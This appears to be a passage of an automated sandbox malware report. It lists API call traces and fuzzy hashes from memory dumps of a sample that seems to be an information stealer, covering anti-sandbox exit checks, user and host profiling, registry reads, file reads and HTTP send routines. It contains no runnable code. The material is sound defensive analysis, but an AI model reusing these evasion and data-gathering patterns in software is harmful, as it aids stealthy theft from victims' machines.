                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                  • Instruction ID: a8d43c492d7d6147a6ac3b4b495328721cac0bdb4fda7375b645000892042c31
                                  • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                  • Instruction Fuzzy Hash: F5215BB5D00219ABDF10DFA4EC48AEDBB75FF04320F008225F929A7290EB706A05CF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F790B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F7912
                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 022F7944
                                  • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 022F7965
                                  • RegCloseKey.ADVAPI32(00000000), ref: 022F796F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                  • Instruction ID: 87d877fa59fbaa6c8ea20321ce2aa53ff228c707c175ba53dda5d6953ad90a4f
                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                  • Instruction Fuzzy Hash: 49012CB9A80209BBEB10DBE0DD49FADB7B9EB48701F005164BA0596284D6749900CF51
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                  • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,00885FA0,00000000,00020119,00000000), ref: 004176DD
                                  • RegQueryValueExA.ADVAPI32(00000000,0088ABB8,00000000,00000000,?,000000FF), ref: 004176FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3466090806-2517555085
                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                  • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                  • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                  • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,00885FA0,00000000,00020119,004176B9), ref: 0041775B
                                  • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                  • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3466090806-1022791448
                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                  • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                  • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                  APIs
                                  • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                  • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: :A$:A
                                  • API String ID: 1378416451-1974578005
                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                  • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                  • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022E75A1
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022E7618
                                  • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022E7674
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 022E76B9
                                  • HeapFree.KERNEL32(00000000), ref: 022E76C0
                                    • Part of subcall function 022E94A7: vsprintf_s.MSVCRT ref: 022E94C2
                                  • task.LIBCPMTD ref: 022E77BC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                  • String ID:
                                  • API String ID: 700816787-0
                                  • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                  • Instruction ID: 016dc93e85b805816bedacee705b5acf0006b569dc39df1aa97c86f7f1d92936
                                  • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                  • Instruction Fuzzy Hash: 26613DB591026C9BDF24DB90CC41FE9B7B9BF44300F4081E9E68AA6144EBB05BC5DF91
                                  APIs
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022E64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022E6548
                                    • Part of subcall function 022E64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 022E656A
                                    • Part of subcall function 022E64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E659C
                                    • Part of subcall function 022E64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E65EC
                                    • Part of subcall function 022E64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022E6626
                                    • Part of subcall function 022E64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022E6638
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022F557F
                                  • lstrlen.KERNEL32(00000000), ref: 022F5596
                                    • Part of subcall function 022F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022F90B9
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 022F55CB
                                  • lstrlen.KERNEL32(00000000), ref: 022F55EA
                                  • strtok.MSVCRT(00000000,?), ref: 022F5605
                                  • lstrlen.KERNEL32(00000000), ref: 022F5615
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                  • String ID:
                                  • API String ID: 3532888709-0
                                  • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                  • Instruction ID: 2e94e57ee7bd006ace08b5aa9786c55100ad72b271a6cd4957ed0b52d2c8f3bc
                                  • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                  • Instruction Fuzzy Hash: 8651BB715203489BCB68EFE4DEA5AEDB776AF10301F904038EA0A66694DB346B49CF51
                                  APIs
                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 022F7345
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,022F7574,004205BD), ref: 022F7383
                                  • memset.MSVCRT ref: 022F73D1
                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 022F7525
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: OpenProcesslstrcpymemset
                                  • String ID:
                                  • API String ID: 224852652-0
                                  • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                  • Instruction ID: ec03d3f3d8c1cbde2bd9eca07fd8be41c342852b5703ea6fe1a482844a79d522
                                  • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                  • Instruction Fuzzy Hash: 56518FB1C203199BDBA4DBE4DC84BEDF775AF44305F5040B8E609A7284DB746A88CF58
                                  APIs
                                  • memset.MSVCRT ref: 022F433C
                                  • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 022F435B
                                  • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 022F437F
                                  • RegCloseKey.ADVAPI32(?), ref: 022F4389
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F43AE
                                  • lstrcat.KERNEL32(?,0064A168), ref: 022F43C2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                  • Instruction ID: 416fecc4e2f557640287aa9c71e1c30ad43fa06f8c2e7e63c33b1aa53bcb34a7
                                  • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                  • Instruction Fuzzy Hash: E041C7B69502087BDB14FBE0DC46FEF733AAB49700F004558A71957184EAB55A98CFE1
                                  APIs
                                  • memset.MSVCRT ref: 004140D5
                                  • RegOpenKeyExA.ADVAPI32(80000001,0088B0A8,00000000,00020119,?), ref: 004140F4
                                  • RegQueryValueExA.ADVAPI32(?,0088BE50,00000000,00000000,00000000,000000FF), ref: 00414118
                                  • RegCloseKey.ADVAPI32(?), ref: 00414122
                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                  • lstrcatA.KERNEL32(?,0088BDA8), ref: 0041415B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                  • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                  • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                  • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                  APIs
                                  • strtok_s.MSVCRT ref: 00413588
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • strtok_s.MSVCRT ref: 004136D1
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00883680,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpystrtok_s$lstrlen
                                  • String ID:
                                  • API String ID: 3184129880-0
                                  • Opcode ID: dbbd9b12a914175184af0c3d7732a4fa56912c4259726abfbaa9763b1c27244b
                                  • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                  • Opcode Fuzzy Hash: dbbd9b12a914175184af0c3d7732a4fa56912c4259726abfbaa9763b1c27244b
                                  • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                  APIs
                                  • __lock.LIBCMT ref: 0041B39A
                                    • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                    • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                    • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                  • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                    • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                  • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                  • String ID:
                                  • API String ID: 2005412495-0
                                  • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                  • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                  • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                  • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                  APIs
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022F9B08
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022F9B21
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022F9B39
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022F9B51
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022F9B6A
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022F9B82
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 022F9B9A
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022F9BB3
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022F9BCB
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022F9BE3
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022F9BFC
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022F9C14
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022F9C2C
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022F9C45
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022E1437: ExitProcess.KERNEL32 ref: 022E1478
                                    • Part of subcall function 022E13C7: GetSystemInfo.KERNEL32(?), ref: 022E13D1
                                    • Part of subcall function 022E13C7: ExitProcess.KERNEL32 ref: 022E13E5
                                    • Part of subcall function 022E1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 022E1392
                                    • Part of subcall function 022E1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 022E1399
                                    • Part of subcall function 022E1377: ExitProcess.KERNEL32 ref: 022E13AA
                                    • Part of subcall function 022E1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022E14A5
                                    • Part of subcall function 022E1487: __aulldiv.LIBCMT ref: 022E14BF
                                    • Part of subcall function 022E1487: __aulldiv.LIBCMT ref: 022E14CD
                                    • Part of subcall function 022E1487: ExitProcess.KERNEL32 ref: 022E14FB
                                    • Part of subcall function 022F69D7: GetUserDefaultLangID.KERNEL32 ref: 022F69DB
                                    • Part of subcall function 022E13F7: ExitProcess.KERNEL32 ref: 022E142D
                                    • Part of subcall function 022F7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,022E141E), ref: 022F7AE7
                                    • Part of subcall function 022F7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 022F7AEE
                                    • Part of subcall function 022F7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 022F7B06
                                    • Part of subcall function 022F7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F7B77
                                    • Part of subcall function 022F7B47: RtlAllocateHeap.NTDLL(00000000), ref: 022F7B7E
                                    • Part of subcall function 022F7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 022F7B96
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D31
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022F6D4F
                                  • CloseHandle.KERNEL32(00000000), ref: 022F6D60
                                  • Sleep.KERNEL32(00001770), ref: 022F6D6B
                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D81
                                  • ExitProcess.KERNEL32 ref: 022F6D89
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                  • Instruction ID: 417c4337a14bd03aa24b9d96b69d9c7b9ca1aa6d988d8f6a3b71d8e46c256cfb
                                  • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                  • Instruction Fuzzy Hash: 8A312876A60308AADB84FBF0DC55BFDF37AAF14300F504538A616A6298EF745A44CE61
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                  • ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                  • LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                  • CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                  • Instruction ID: 461739f713f6582ed5ccc2497ea68013164b4033f14286a6be278cc584591a67
                                  • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                  • Instruction Fuzzy Hash: 5F311878A10209EFDF14DFD4C884BAE77F5FB49314F108159E916A7294C774AA81CFA1
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                  • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 41a9ac40214c004258481c146167ca84ac173594ef3507387ebcdc5aa67caad4
                                  • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                  • Opcode Fuzzy Hash: 41a9ac40214c004258481c146167ca84ac173594ef3507387ebcdc5aa67caad4
